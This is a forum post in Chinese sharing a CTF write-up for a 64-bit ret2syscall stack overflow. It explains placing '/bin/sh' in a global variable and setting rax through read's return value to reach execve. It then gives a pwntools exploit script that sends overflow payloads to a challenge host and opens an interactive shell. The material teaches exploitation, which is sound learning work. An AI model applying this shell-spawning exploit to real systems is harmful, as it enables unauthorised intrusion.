-
-
[分享]ret2syscall64位栈溢出漏洞CTF
-
发表于: 2023-12-7 16:48
-
今天来看一道RET2SYSCALL64位的栈溢出程序
明显没有后面函数没有/bin/sh等
所以需要自己构造
有栈溢出漏洞
有一个输入的全局变量,考虑直接将/bin/sh输入进全局变量中
此程序没有使用plt,got表等libc,所以不能采用泄漏libc的方法来做
但是看到read write等函数调用了syscall系统调用,所以可以考虑采取retsyscall的方法。此程序为64位程序。
所以查询调用表
rax=0X3B调用,然后该程序没有pop rax,所以不能考虑栈溢出来控制rax的值。但是_read函数的返回值是输入的字节返回给RAX以此来控制rax的值。
rdi为第一传参器。所以考虑将str构造的/bin/sh赋给rdi
故可以有一下exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | from pwn import *from LibcSearcher import LibcSearchersh=remote("1.container.jingsai.apicon.cn",30296)sh=process("/home/xinhu/1/vuln")context(os='linux', arch='amd64', log_level='debug')# gdb.attach(sh)pop=0x401197str=0x4040b3payload1=b'1'*40+p64(pop)+p64(0x404081)+p64(0x404081)+p64(str)payload2=b'\x00'*52+b'/bin/sh'sh.sendline(payload1)sh.recvuntil("Anything else?\n>")# sleep(6)sh.send(payload2)sh.interactive() |
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
